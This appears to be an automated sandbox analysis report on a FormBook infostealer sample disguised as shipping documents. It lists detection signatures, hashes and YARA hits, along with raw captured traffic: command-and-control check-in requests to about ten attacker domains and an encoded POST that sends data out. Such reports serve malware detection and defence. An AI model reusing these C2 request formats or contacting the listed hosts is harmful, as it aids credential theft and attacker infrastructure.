Windows Analysis Report
Original Shipping Documents.scr.exe

Overview

General Information

Sample name:	Original Shipping Documents.scr.exe
Analysis ID:	1674192
MD5:	3c67aeebbdc9b5fb68e8fbe01ddee0cc
SHA1:	f3fefd270eeb1b6c7d0687b67103bff06b6a071e
SHA256:	10e7df181627a2f66999dc4bf87095501b2e69833efd4ea6262e27f0b5b4b272
Tags:	exeuser-TeamDreier
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.fix.shopping	Avira URL Cloud: Label: malware
Source: http://www.fix.shopping/39bh/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: Original Shipping Documents.scr.exe	Virustotal: Detection: 36%			Perma Link
Source: Original Shipping Documents.scr.exe	ReversingLabs: Detection: 75%

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Uses 32bit PE files

Source: Original Shipping Documents.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Original Shipping Documents.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: SecEdit.pdb source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SecEdit.pdbGCTL source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipping Documents.scr.exe, Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dfxE.pdb source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: dfxE.pdbSHA256c source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBk0IlKjg.exe, 0000000F.00000000.1666851745.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812032657.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49735 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49727 -> 109.234.166.73:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 91.204.209.204:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49722 -> 154.26.130.10:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49731 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49739 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 172.67.157.228:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RACKSRVGB RACKSRVGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /50pk/?NV0x=UatWUPwGe7DsxKy0VpyPjoZZeqT3/D+oqE9HKyy052xkRbhlqvcyf+yJGchafTWHbhBRQJeXcW7pObH2VGdr3QNAdAMdYHmr6Qwwnm2JendAk1vhJi3wtCQ=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.hindi.fitConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /kemb/?NV0x=OtAuTPRl1kDBhmK2/ZcaDoTOd2MJoGv8l3k4MKxOdzSNFOYEX/q6kO1dEp++5effGBeOQEkgpP67gpLugdEwkzJNfsZQm0vYe/7xIMV/x9EFSgqr47CH1D8=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.cyberpraxis.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /2sqb/?fx=PJqHwJIxk&NV0x=+fltX0Xxpe/2LSVD8m4BrtVqS8n/YOcrmcHmQiB7a7fOdTqL57f3jcjaSrihHS6K1XFnl/jmmnj08U3CIiqGBEHW915YAb6OBksulDhZFx+MDvATO4qO2ho= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.jellymint.siteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /8cwp/?NV0x=KhipwiSlW/4Hb37kPStoE2pMnu59chQZ9ka6UWiIDNU9Q2YyUEAUpX0LWbEOlqQMn8pKMjxJQDnAF7TIB6qDd6fZ58RaxBuQLPS4FysLpPk0cqfTGDuCo5c=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.roastroots.lolConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /kagl/?fx=PJqHwJIxk&NV0x=K95ulZCSolJS3eioycnjNGWafVzuHtQO2pkjqg3ejaxjnhs3tS5iRYVF5zFPvGGJqke4OJGl2WxEz9erEoLFVIvSNhKPQKc2BBaZOHjfEayNPL0E6HksTrU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.iphone16.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /myyf/?NV0x=GlcGYC6HwpT8FabkC2tIIvL78tiN76bcfV84plwb5Nk3nkwE+AKc+Ww/obdAtKSDyrDzoNhn0jGqHXx8J9NsdxaajmTH1agn5G5dMUJahxrsZccDpQXyw5A=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.mediabin.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /5vpr/?fx=PJqHwJIxk&NV0x=+G0AH6DrGRv44yDCa/j2ssT4mfjo1sUoBGZRgbd1gS65+xyLkdtC0Cvs5le0Y1VYKQMTtp+fQhPKIiyCVjWgju6IEd/GUutEVJtULhj7mKOpmxKJPk9TuAI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.rhdrfny.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /5qss/?NV0x=Q7uHA4M8+SGSZm8H0sIwOGJ1uzobBzpe8sNnYolR9PVpRS3oJ0rxHB/TMtSDpzMfFZyb9/p20naNow9tF3+w/lLhFaEJKaBWgHepathAhUpBn8iETtZ+qDk=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.zthzzyg.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /hd77/?fx=PJqHwJIxk&NV0x=RlzYfCAdwUb1Jru/CzszGz+qd5swGE7HqmFK4x+UffEP9q3zAfq1qiartZXEvxFFo0G04r8H3ye0T0T0dcsmHX5PnkXW4PMUevrRpetv/04XSqj9dko3Bk0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.venturegioballng.funConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /vlio/?NV0x=G7HknLZOpYbpunPc2/Mlx0+cxkt8WTq0H6L3rInGHLbTuVGJGBGDqhana0vh34sPSPxfgwK5+WwJ6tgqsap1UbvXdhKYkdSrX12Wu80AYiseY/X7+dEpV24=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.dietproio.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)

Source: global traffic	DNS traffic detected: DNS query: www.hindi.fit
Source: global traffic	DNS traffic detected: DNS query: www.cyberpraxis.pro
Source: global traffic	DNS traffic detected: DNS query: www.jellymint.site
Source: global traffic	DNS traffic detected: DNS query: www.roastroots.lol
Source: global traffic	DNS traffic detected: DNS query: www.iphone16.shop
Source: global traffic	DNS traffic detected: DNS query: www.mediabin.info
Source: global traffic	DNS traffic detected: DNS query: www.rhdrfny.top
Source: global traffic	DNS traffic detected: DNS query: www.zthzzyg.top
Source: global traffic	DNS traffic detected: DNS query: www.venturegioballng.fun
Source: global traffic	DNS traffic detected: DNS query: www.dietproio.info
Source: global traffic	DNS traffic detected: DNS query: www.fix.shopping

Source: unknown

HTTP traffic detected: POST /kemb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.cyberpraxis.proContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 201Origin: http://www.cyberpraxis.proReferer: http://www.cyberpraxis.pro/kemb/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)Data Raw: 4e 56 30 78 3d 44 76 6f 4f 51 35 52 6b 78 42 79 52 6b 58 69 74 75 71 41 37 4f 75 76 68 62 56 39 36 70 44 36 6b 6e 30 41 4b 44 36 46 6d 65 48 75 49 41 63 35 37 5a 74 6a 4d 73 2b 5a 73 46 49 33 46 35 66 72 38 50 79 79 53 59 77 55 64 34 64 57 5a 67 4e 58 65 70 39 46 49 76 69 74 74 5a 76 64 4c 6e 55 58 34 56 66 76 35 4a 72 73 68 78 65 45 4f 53 78 61 6c 2b 4c 43 4a 31 44 36 68 31 53 69 79 34 75 47 6e 57 68 44 4c 50 68 6c 7a 33 54 76 47 36 76 6c 77 58 4a 63 65 61 69 65 59 6a 54 41 51 64 30 73 46 70 4c 76 78 2b 71 66 76 73 36 39 37 57 5a 72 64 6b 77 33 33 63 78 33 66 31 76 33 4e 4e 39 35 79 6c 51 3d 3d Data Ascii: NV0x=DvoOQ5RkxByRkXituqA7OuvhbV96pD6kn0AKD6FmeHuIAc57ZtjMs+ZsFI3F5fr8PyySYwUd4dWZgNXep9FIvittZvdLnUX4Vfv5JrshxeEOSxal+LCJ1D6h1Siy4uGnWhDLPhlz3TvG6vlwXJceaieYjTAQd0sFpLvx+qfvs697WZrdkw33cx3f1v3NN95ylQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:15 GMTContent-Type: text/htmlContent-Length: 1251Connection: closeVary: Accept-Encodingcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cacheServer: o2switch-PowerBoost-v3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
